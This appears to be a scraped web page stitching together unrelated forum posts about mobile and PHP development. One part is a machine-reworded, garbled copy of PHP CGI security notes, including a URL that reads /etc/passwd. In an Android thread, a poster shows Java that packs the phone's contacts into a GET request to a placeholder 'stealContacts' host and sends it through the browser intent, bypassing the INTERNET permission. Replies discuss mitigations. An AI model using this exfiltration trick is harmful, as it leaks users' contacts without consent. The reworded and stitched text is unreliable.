Hi experts,
I am an reasonably good php scripter, but know just the very very basics of mobile app development (Java/Smali/Android Studio).
I really have no interest in trying to learn enough to build a decent app as time is a big limiting factor for me.
I have an idea for an app, and I know I could do the whole thing in php quite easily, but I would like it to be a downloadable app, is it possible to write my software in php, and then have a very basic android/IOS app that basically just loads the website, the only thing the app needs to do, is run the webpages in fullscreen and hide any browser elements (url bar, scroll bar etc). The only thing that may be challenging is enabling "swipe" abilities, but I can live without that and just use hyperlinks for moving around, I would also look at preloading content so the app runs smooth. At some point if the app gets any interest I would pay to get ti developed properly.
Keen to hear your thoughts - maybe there are other apps already doing this I can copy, and I know some may say why not just make it browser based, but I believe the app store itself its the critical part of advertising and exposure of this service, also means I can release a real app version in the future and have it pushed to all devices.
Conceivable assaults ¶
Utilizing PHP as a CGI paired is a possibility for setups that for reasons unknown don't wish to incorporate PHP as a module into server programming (like Apache), or will utilize PHP with various types of CGI wrappers to make safe chroot and setuid situations for scripts. This setup typically includes introducing executable PHP paired to the web server cgi-receptacle catalog. CERT consultative » CA-96.11 prescribes against setting any mediators into cgi-canister. Regardless of the possibility that the PHP double can be utilized as a standalone mediator, PHP is intended to keep the assaults this setup makes conceivable:
Getting to framework documents: http://my.host/cgi-container/php?/and so forth/passwd The inquiry data in a URL after the question mark (?) is passed as summon line contentions to the mediator by the CGI interface. Generally translators open and execute the document indicated as the primary contention on the order line. At the point when summoned as a CGI paired, PHP declines to decipher the charge line contentions.
Getting to any web record on server: http://my.host/cgi-receptacle/php/mystery/doc.html The way data part of the URL after the PHP twofold name,/mystery/doc.html is traditionally used to indicate the name of the document to be opened and deciphered by the CGI program. Typically some web server setup orders (Apache: Action) are utilized to divert solicitations to archives like http://my.host/mystery/script.php to the PHP translator. With this setup, the web server first checks the get to authorizations to the registry/mystery, and after that makes the diverted demand http://my.host/cgi-canister/php/mystery/script.php. Sadly, if the demand is initially given in this shape, no get to checks are made by web server for record/mystery/script.php, yet just for the/cgi-container/php document. Thusly any client ready to get to/cgi-canister/php can get to any secured archive on the web server. In PHP, runtime design orders cgi.force_redirect, doc_root and user_dir can be utilized to keep this assault, if the server record tree has any indexes with get to confinements.
Related
I'm in the process of redesigning our local access station's web site. I'm just about finished, except for a program guide system. Currently, the "program schedule" page is simple HTML, but there are a number of problems with this system.
First off, the person who updates the schedule is by no means a web designer, and the page slowly deteriorates as tweaks are accidentally made while updating.
Secondly, the new site is designed to show the current day's program schedule on each page. It would obviously be a royal pain to update this manually using HTML, so we're looking for some sort of PHP calendar system on the site: PHPKode to integrate into the site.
What we need is a simple PHP/MySQL calendar system that will allow us to integrate a daily schedule into a sidebar, and set up a program grid on the main schedule page.
As in the above example, we'd like the program name to link to that show's page.
I've looked around for a few days trying to find a good system, but haven't had much luck. I don't know if there are any PHP "program guide" scripts out there, but I would think there would be some sort of calendar that could accomplish this job.
I should note I know a little bit of PHP/MySQL scripting - enough to do some *minor* tweaking to a simple script, but I'm by no means fluent with it. Bottom line- the less scripting I have to do, the better.
The current version of the site can be viewed here. (We haven't transfered our domain to the new server yet, hence the subdirectory setup.) The weather sidebar is a placeholder for the program schedule. I appreciate any suggestions or advice, so thanks in advance to anyone who can point me in the right direction!
I don't participate much, but I've learned a great deal from this site. So I'm posting this here as GPL2 software as a way of thanking everyone. All I really ask is that it not be used in a closed-source app without talking to me first.
Can't poast URLs, because I have fewer than 10 poasts (I lurk hard). Mod, if you don't deem this to be spam, would you kindly provide the link (or allow me to do so)?
[sourceForge.net]/projects/webremote/
Basically, this was meant to be a generalized HTTP(S) client, with the URLs being assembled dynamically and under a variety of different circumstances. The server-end of the transaction is a creation of the user.
I wrote this tool to assist me with repititive tasks at work (specifically, asterisk/linux administration). I wrote a PHP page to do things like add users, check server load, trigger recordings and dialplan modes, and so forth.
I have also used it in conjuction with a Raspberry Pi to trigger relays and read sensors in my home from wherever I happen to be at that moment.
There are lots of things I want to do with this app...
Implement GPS, so I can trigger URLs at waypoints.
Tie into NFC and make a bitcoin wallet that you can "bump" or scan a QR code to pay someone.
Implement Trigger packages to support one-click importing of Triggers for a specific task (IE, minecraft server administration)
Use BouncyCastle to encrypt the DB.
Hook into the camera and fire triggers using snapshots (or image files) as arguments.
Actually cause the HTTPS Receivers to validate certificates. Presently it does not (although the traffic is still encrypted).
I will take requests, questions, and bug reports at the sourceforge page, but how fast things get done will directly correlate to how much interest the project attrracts (which may very well be none).
For those learning how to program and trying to learn something by reading the source, I'm sorry.
I've tried to keep things hygenic. I come from a C/Java background, so Android was a bit of a leap, with respect to its organization. This program is a work of evolution.
To check out the source, use subversion:
svn checkout svn://svn.code.sf.net/p/webremote/code/trunk webremote
My working copy is also my Eclipse directory, so importing it with Eclipse should be minimal trouble.
If anyone *really* wants to thank me, I am a bitcoin user:
12rA36FH4NUFZojxyxQgWmQm6WUnzfQ1yR
Or you could buy the version I have up at google play (but I consider this a donation):
Can't poast URLs.... Search the Play store for WebRemote.
Thank you all again for sharing your knowledge.
Hi all,
I have a question to share with you about the Intent mechanism and I hope to start an interesting discussion.
As you (may) know through the use of "Intent" an app can send data to another app of an operation to be performed. For example, from my app I can send an Intent to the browser app in order to open a specific url. But the Intent mechanism seems (correct me if I am wrong) to not apply any security mechanism. Suppose I want to steal the contacts from a device and send them to a web server, if I want to perform these two operations I need the following permissions:
Code:
<uses-permission android:name="android.permission.READ_CONTACTS"/>
<uses-permission android:name="android.permission.INTERNET"/>
the former to read the contacts and the latter to send the data to the web server, but this is not true. In fact, I developed a simple app (named myApp) with the following permission:
Code:
<uses-permission android:name="android.permission.READ_CONTACTS"/>
Basically myApp reads the contacts (it holds the permission) and builds a string like the following:
Code:
String request = "http://ww.example.com/stealContacts?"
request += nameContact1=number1&nameContact2=number2&...
Finally, I put the request in the intent (see below), this means that I want to perform a "get request" to the web app http://ww.example.com/stealContacts and send as parameters all the contacts with the phone number.
Code:
Intent i = new Intent(Intent.ACTION_VIEW);
i.setData(Uri.parse(request));
startActivity(i);
In order to test this, I developed a web app that when triggered save all the parameters in the request and show an advertising page.
From my point of view this is very strange, because I can steal the contacts easily.
what do you think? is it a security breach?
You have the permission to read contacts and use the internet. You read the contacts and uploaded them to the internet. I don't see any exploit here, besides unethical behavior.
Hi iBotPeaches, thank you to join the discussion.
I don't give to myApp the permission to use internet, I only give it the READ_CONTACTS, but through the Intent I can send the contacts to internet. I cannot directly open an HTTP connection in myApp.
Yes, this is a fairly well "known" attack - you can use the web browser intent to "leak" information via GET variables.
I am not certain it's a "breach" in the true sense, since Android seems to be an over-trusting platform. I suggest taking a look at XPrivacy on XDA, since its "view" permission for websites will prevent this attack from working unless the user chooses to trust the app (by default it doesn't trust anything).
This is not a security-break. You can only use this permissions you gave. Ist almost impossible gaining permissions without declearing them.. There is a GPS Exploit around which enables GPS without permissions and user confirmation but i think ist fixed in android 3.0+
I second the XPrivacy recommendation and would add OpenPDroid. Both allow you to prevent apps from launching URLs in native Android Browser. XPrivacy allows you to choose which of your accounts and which of your contacts (if any) to allow apps to access.
@simone.mutti - you may be the perfect candidate for this given your interest and ability to develop Android apps:
What the community really needs is a "proof of concept" app that requests all permissions necessary to display all identifying data available/entrusted to Android core services. The app would request the absolute minimum permissions needed to access every bit of data "protected" (aka denied) or "obscured" (aka falsified) by things like XPrivacy and OpenPDroid.
The propose of the app would be twofold:
1) allow users to verify the effectiveness of privacy apps. Currently, XPrivacy's developer recommends NetInfo 2 for the purposes of verifying the efficacy of his app's different privacy features. But the picture is incomplete as NI2 wasn't developed for this purpose.
2) demonstrate the ease with which users can unwittingly supply an app with an inordinate amount of identifying data with the tap of the "install" button. This would serve a similar benefit as pen testing tools by highlighting to non-developers (aka lay people) the various pitfalls of current Android framework. The most excellent, poignant finishing touch would be to allow it to read all intents/permissions of installed Android apps and present the various data each app is allowed to access + the various methods through which it could "legitimately" send that data to some undeclared outside server with/without encryption. Not the easiest task but certainly transformative in terms of clue-ing casual users into the true cost of their "free"and paid apps.
Check out the latest flavor of Angry Birds for a poster-perfect example of data sucking apps at their worst.
I want to develop a very basic app.
Main function: Show the value of a cryptocurrency
My problem: I don't know how to get the value of this cryptocurrency from this website and put it on my app. I want it so every time I push the refresh button it gets the newly updated value and prints in on the screen.
Hi,
To get values from a website, you can use a technique called screen scraping. To do that you can use Jsoup. A very good start point is to search for "Jsoup HTML Parser Hello World Examples" and check the mkyoung examples (I can not post links yet).
In order to examine the html you can use a web inspector like Firebug.
Jsoup is a nice library especially since it can handle fetching the document for you (not always desirable though) and has a familiar jQuery-like syntax. I've used it in projects before and it's pretty quick to get going with.
Hi!
(Disclaimer: I do not have a degree in CS or SE yet, and my knowledge stems from high school and some freelance work. I have coded a few programs and an app before, Though I might have some methods / ideas that would look horrible to you. If such is the case - Please tell me! I am still learning and might sometimes go a certain rout which works but is completely "wrong" regarding coding standards. (For instance: I have a note taking app which saves its content in a text file, which i am pretty sure is not how any other app works)).
My question:
I am in the process of coding an Android app, which needs as a part of the service it provides to send certain messages (text only) to the app users PC (one way).
I would like to use some sort of central service, since in my understanding of routers and IP i'd have to have the user set up port forwarding if his PC is behind a router (which'd be complicated for most users) (If this is untrue and using an IP based solution would be better/simpler then please explain how so).
The first solution i have devised (Which i would very much like to avoid) is to use a third party service (such as Pushbullet) as a means to transfer the messages without paying for any services myself. This is less convenient since (to my understanding) I'd have to name the app "X for Pushbullet" and might have some legal trouble, and also would be dependent on a third party.
The second solution I've thought of would be to host (as in pay monthly for hosting on a server) an online DB with usernames and messages (the message table containing a column for what user sent the message as well), and a local program (written in C# or Python probably) on the target PCs which searches the DB every X interval for new messages for X username. This seems like it would work, though probably isn't the most graceful way to go about it.
Would really like to hear how a more experienced programmer would tackle this problem!
Thanks a lot in advance!